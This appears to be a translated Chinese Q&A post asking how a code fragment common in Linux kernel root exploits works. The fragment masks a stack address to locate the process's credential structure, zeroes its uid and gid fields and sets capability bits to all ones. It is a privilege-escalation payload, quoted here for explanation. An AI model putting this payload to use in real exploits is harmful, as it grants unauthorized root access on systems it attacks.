在某些获取root shell的漏洞利用中,经常会看到这样一个指针:
int i;
unsigned *p = *(unsigned**)(((unsigned long)&i) & ~8191);
有人可以稍微解释一下这个指针吗?我认为8191是内核堆栈的大小。p
指向内核堆栈底部?以下是指针p
的使用方法:
int i;
unsigned *p = *(unsigned**)(((unsigned long)&i) & ~8191);
for (i = 0; i < 1024-13; i++) {
if (p[0] == uid && p[1] == uid &&
p[2] == uid && p[3] == uid &&
p[4] == gid && p[5] == gid &&
p[6] == gid && p[7] == gid) {
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
p = (unsigned *) ((char *)(p + 8) + sizeof(void *));
p[0] = p[1] = p[2] = ~0;
break;
}
p++;
}
1111111111111
的十进制数是8191
,而long
类型是 32 位。要给出一个确切的答案,我们需要看一下*p
指针是如何被使用的。&
运算符可能是某种位掩码。 - Tim Biegeleisen